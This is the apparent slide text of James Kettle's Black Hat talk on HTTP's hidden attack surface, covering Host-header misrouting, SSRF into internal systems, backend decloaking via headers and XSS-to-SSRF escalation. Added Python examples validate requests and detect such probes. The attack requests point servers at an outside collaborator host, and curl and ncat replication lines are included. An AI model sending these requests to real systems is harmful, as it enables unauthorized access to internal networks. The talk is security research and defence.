CRACKING THE LENS - Black Hat Briefings

Posted on 01-May-2018


CRACKING THE LENS

James Kettle

EXPLOITING HTTP'S HIDDEN ATTACK-SURFACE

An Unexpected Pingback – cloud.mail.ru / imgur.com

Pingback from bn-proxy1a.ealing.ukcore.bt.net

predator.alien.bt.co.uk

cloud.mail.ru:80 (HTTP)   cloud.mail.ru:443 (HTTPS)   258 bytes | 52 millis

Outline

• Speculative Attack Pipeline
• Misrouting Requests
• Targeting Auxiliary Systems
• Demo
• Q&A

Speculative Attack Pipeline

Listening

• DNS Listener
• Burp Collaborator Client
• Private Collaborator server recommended
• Roll your own
• Canarytokens

Inviting Responses

• Burp match/replace
• No correlation
• Collaborator Everywhere
• Masscan
• No HTTP/1.1 or SSL/TLS
• ZMap/ZGrab

Lazily Assembling an Audience

HackerOne, BugCrowd
  → Scope Regex
  → 3 mill hosts
  → DNS Database (Project Sonar)
  → 50k web servers (ip address, hostname)
  → Suitable target spreadsheet
  → Profit

Maximizing Attack Surface

GET / HTTP/1.1
Host: {host1, host2, host3}
X-Forwarded-Proto: {HTTPS, HTTP}
Cache-Control: no-transform
Max-Forwards: {1, 2, 3}

Misrouting Requests

REVERSE PROXY
  → PUBLIC APP
  → INTERNAL APP

Misrouting Requests

GET / HTTP/1.1
Host: id.burpcollaborator.net

Exploited:
• 27 DoD servers
• ats-vm.lorax.bf1.yahoo.com
• My ISP
• Colombian ISP doing DNS poisoning

ats-vm.lorax.bf1.yahoo.com 1/3

ats-vm.lorax.bf1.yahoo.com 2/3

ats-vm.lorax.bf1.yahoo.com 3/3

+15,000 +5,000 → $20,000

Investigating Intent - BT

• All TCP/80 traffic to blacklisted IPs gets proxied
• Masks all incoming BT traffic
• /0 traceroute (ttl=10)
• Caches, self-hosted sites, speedtests, and blacklisted IPs

GET / HTTP/1.1
Host: www.icefilms.info

HTTP/1.1 200 OK
…
<p>Access to the websites listed on this page has been blocked pursuant to orders of the high court.</p>

GET http://104.31.17.3/ HTTP/1.1
Host: www.icefilms.info

HTTP/1.1 200 OK
…
<title>IceFilms.info - Quality DivX Movies</title>

Investigating Intent - METROTEL

• vk.com pingback from 200.89.96.13
• DNS poisoning image hosts, social networks, and bbc.co.uk
• Which articles?
• Perspectives/Convergence
• Backslash Powered Diffing, ETag

"healthy internet"

Input Mangling

GET / HTTP/1.1
Host: vcap.me

GET /vcap.me/vcap.me
Host: outage.vcap.me
Via: o2-b.ycpi.tp2.yahoo.net

GET / HTTP/1.1
Host: ../?x=.vcap.me

GET /vcap.me/../?x=.vcap.me
Host: outage.vcap.me
Via: o2-b.ycpi.tp2.yahoo.net

+5,000 → $25,000

Absolute URLs

GET http://blah/ HTTP/1.1
Host: one.mil

If you're looking at this and are not in the military or DoD this won't mean anything to you, nor will you be able to access it….

Incapsula: hostname:ignoredPort

Backend: http://user:pass@hostname/

Ambiguous Exploits - Incapsula

GET / HTTP/1.1
Host: incap-client:80@internal.net

Apache HttpComponents

URL backendURL = new URL("http://backend-server/");
String uri = ctx.getRequest().getRawUri();

// The client-supplied raw target becomes the path of the rebuilt URI. A target
// that starts with '@' is concatenated straight after the backend host, so the
// result re-parses with "backend-server" as userinfo and burpcollab.net as host.
URI proxyUri = new URIBuilder(uri)
        .setHost(backendURL.getHost())
        .setPort(backendURL.getPort())
        .build();

GET @burpcollab.net/ HTTP/1.1

http://backend-server@burpcollab.net/

GET @burpcollaborator.net/ HTTP/1.1

Service-Gateway-Is-Newrelic-Admin: false

+8,000 → $33,000

GlobaLeaks

GET xyz.burpcollaborator.net:80/ HTTP/1.1
Host: demo.globaleaks.org

SSRF through Tor

xYZ.BurpcoLLABoRaTOR.neT. from 89.234.157.254
Xyz.burPColLABorAToR.nET. from 62.210.18.16
xYz.burpColLaBorATOR.net. from 91.224.149.254
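As an added example (not from the talk, and not the code of any product named above), the following Python models the request-target and Host checks a strict reverse proxy would apply to the misrouting, input-mangling, absolute-URL, Incapsula and Apache HttpComponents requests shown in the preceding slides. The ALLOWED_HOSTS values and the function names are assumptions.

```python
"""Strict request-target and Host validation for a reverse proxy (added example)."""
import re
from urllib.parse import urlsplit

# Assumed allow-list: the only hostnames this edge will route to a backend.
ALLOWED_HOSTS = {"example.com", "www.example.com"}

# Host must be a bare hostname with an optional numeric port and nothing else.
_HOST_RE = re.compile(r"^([A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?)(?::(\d{1,5}))?$")


def parse_host(value):
    """Return (host, port) for a plain 'host[:port]' value, otherwise None."""
    m = _HOST_RE.match(value.strip())
    if not m:
        return None  # rejects '@', '/', '..', '?', userinfo, spaces, empty
    host, port = m.group(1).lower(), m.group(2)
    if port is not None and not 0 < int(port) < 65536:
        return None
    return host, (int(port) if port else None)


def route_decision(request_line, host_header):
    """Return (allowed, reason) for one request, the way a strict proxy would."""
    parts = request_line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/1."):
        return False, "malformed request line"
    target = parts[1]
    parsed = parse_host(host_header)
    if parsed is None:
        return False, "Host is not a plain hostname[:port]"
    host, _port = parsed
    if host not in ALLOWED_HOSTS:
        return False, "Host not in allow-list"  # never guess a backend
    # origin-form ("/path") is fine, but "//host/..." re-parses as an authority
    if target.startswith("/") and not target.startswith("//"):
        return True, "origin-form target for " + host
    # absolute-form: allowed only if it names the same host and carries no userinfo
    u = urlsplit(target)
    if u.scheme not in ("http", "https") or not u.netloc:
        return False, "target is neither origin-form nor absolute-form"
    if u.username is not None or u.password is not None:
        return False, "userinfo in absolute-form target"  # the '@' trick
    if (u.hostname or "").lower() != host:
        return False, "absolute-form authority does not match Host"
    return True, "absolute-form target for " + host
```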

Exploiting Auxiliary Systems

PUBLIC APP   BACKEND

ATTACKER APP

"The X-Wap-Profile header should contain a URL pointing to an XML document specifying the features of a mobile device"

Decloaking Backend Systems

GET /?a=f.collab.net&a=f.collab.net HTTP/1.1
Host: www.facebook.com
X-WAP-Profile: http://a.collab.net/wap.xml
Referer: http://b.collab.net/ref
X-Forwarded-For: c.collab.net
True-Client-IP: d.collab.net
X-Real-IP: e.collab.net
Connection: close

• URL & Redirect handling
• Auto-authentication - Responder.py
• Client Heartbleed – pacemaker.py
• TCP/IP fingerprinting – p0f
• SSL ciphers, cert validation
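Added detection example, not part of the original slides: it scores one logged request for the pattern on the Decloaking Backend Systems slide, where client-address headers carry hostnames instead of IPs and URL-bearing headers all point at one outside domain. OWN_DOMAINS, the header sets, the two-label domain guess and the sample request (copied from the slide) are assumptions and constructed input.

```python
"""Flagging header-borne backend-decloaking probes in request logs (added example)."""
import ipaddress
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

OWN_DOMAINS = {"example.com"}  # assumed: registrable domains the service owns
IP_ONLY_HEADERS = ("x-forwarded-for", "true-client-ip", "x-real-ip")
URL_HEADERS = ("x-wap-profile", "referer")
_HOSTNAME = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")


def _is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def _parent(host):
    return ".".join(host.split(".")[-2:])  # crude registrable-domain guess (assumed)


def probe_indicators(target, headers):
    """Return indicator strings for one logged request (header names lower-case)."""
    findings, hosts = [], set()
    for name in IP_ONLY_HEADERS:  # these carry client IPs, never hostnames
        for value in headers.get(name, "").lower().split(","):
            if value.strip() and not _is_ip(value.strip()):
                findings.append(f"non-IP value in {name}: {value.strip()}")
                hosts.add(value.strip())
    for name in URL_HEADERS:  # URLs a backend may fetch or resolve on our behalf
        host = (urlsplit(headers.get(name, "")).hostname or "").lower()
        if host and _parent(host) not in OWN_DOMAINS:
            findings.append(f"external URL in {name}: {host}")
            hosts.add(host)
    for _, value in parse_qsl(urlsplit(target).query):  # hostname-shaped params
        if _HOSTNAME.match(value.lower()):
            hosts.add(value.lower())
    for parent, n in Counter(map(_parent, hosts)).items():
        if n >= 3 and parent not in OWN_DOMAINS:
            findings.append(f"{n} hostnames under {parent}: collaborator-style probe")
    return findings


# Constructed sample: the request shown on the Decloaking Backend Systems slide.
SAMPLE_TARGET = "/?a=f.collab.net&a=f.collab.net"
SAMPLE_HEADERS = {"host": "www.facebook.com", "x-wap-profile": "http://a.collab.net/wap.xml",
                  "referer": "http://b.collab.net/ref", "x-forwarded-for": "c.collab.net",
                  "true-client-ip": "d.collab.net", "x-real-ip": "e.collab.net"}
```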

Exploiting Remote Clients

• Pingback inception
• Spray RCE across LAN
• What if they're rendering?
• Spray XSS across LAN - Blind Reflected Server-Side XSS (BRSSXSS)
• XSS /proc/self/environ
• Do they support JavaScript? Or CSS? Do they enforce the SOP? Can I make popups? What about Flash?

Exploiting Remote Clients

Rendering Engine Hackability Probe

JavaScript environment difference: core, __core-js_shared__, System…

• Load <history of blimps>
• Note GET /blimps/F-1.png HTTP/1.1
• Scanning response for resource imports

Pre-emptive Caching

GET / HTTP/1.1
Host: burpcollaborator.net

GET /jquery.js HTTP/1.1
GET /wildcat.jpg HTTP/1.1

https://www.history.navy.mil/our-collections/photography/numerical-list-of-images/nhhc-series/nh-series/NH-43000/NH-43487.html

Escalating XSS to SSRF

REVERSE PROXY
  → PUBLIC APP
  → INTERNAL APP

Escalating XSS to SSRF

ATTACKER   PROXY   PUBLIC APP   INTERNAL

POST /XSS.cgi

<img src="http://internal/index.php/a.jpg">

GET /index.php/a.jpg

Sensitive content

GET /index.php/a.jpg
Host: internal

Sensitive content

DEMO

Defense

• Reverse proxies are going to proxy
• Use a DMZ
• Crawlers are employees with antiquated browsers who click everything
• Welcome researchers
• Have a bug bounty
• Don't forbid automated testing (with custom tools)

Replicating

curl -H 'Host: internal' http://example.com/

echo -e 'GET / HTTP/1.1\r\nHost: example.com\r\n\r\n' | ncat example.com 80

echo -e 'GET / HTTP/1.1\r\nHost: example.com\r\n\r\n' | openssl s_client -ign_eof -connect 7.7.7.7:443

openssl s_client -servername qq.com -ign_eof -connect 7.7.7.7:443

https://github.com/PortSwigger/collaborator-everywhere
https://github.com/PortSwigger/hackability

Further Research

• ZGrab + Burp Collaborator integration
• X-WAP-Profile's friends
• Client exploits
• Tools for automated exploitation (especially blind SSRF)
• Untapped attack surface
• The other layer

Takeaways

Bug bounties enable whitehat research at scale

Load balancers are VPNs for the public

Crawlers are employees who click

@albinowax   Email: james.kettle@portswigger.net